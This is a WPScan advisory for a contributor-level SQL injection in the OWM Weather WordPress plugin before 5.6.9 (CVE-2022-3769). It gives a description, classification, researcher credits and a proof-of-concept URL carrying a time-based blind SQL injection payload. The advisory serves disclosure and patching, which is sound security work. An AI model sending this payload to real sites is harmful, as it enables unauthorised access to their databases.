WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

OWM Weather < 5.6.9 - Contributor+ SQLi

Description

The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as contributor

Proof of Concept

Logon as contributor and open the below URL, which will result in a delayed response (If the "could not find original weather" error occur, just replace the 1 in "post=1" with an existing post id)

https://example.com/wp-admin/admin.php?action=owmw_duplicate_post_as_draft&post=1+AND+(SELECT+7741+FROM+(SELECT(SLEEP(3)))hlAf)

Affects Plugins

owm-weather
Fixed in version 5.6.9

References

CVE
CVE-2022-3769
URL
https://bulletin.iese.de/post/owm-weather_5-6-8/

Classification

Type

SQLI

OWASP top 10
A1: Injection
CWE
CWE-89

Miscellaneous

Original Researcher

Kunal Sharma (University of Kaiserslautern), Daniel Krohmer (Fraunhofer IESE)

Submitter

Kunal Sharma

Submitter website
https://iese.fraunhofer.de/en.html
Verified

Yes

WPVDB ID
2f9ffc1e-c8a9-47bb-a76b-d043c93e63f8

Timeline

Publicly Published

2022-11-02 (about 4 months ago)

Added

2022-11-02 (about 4 months ago)

Last Updated

2022-12-02 (about 3 months ago)

Our Other Services

WPScan WordPress Security Plugin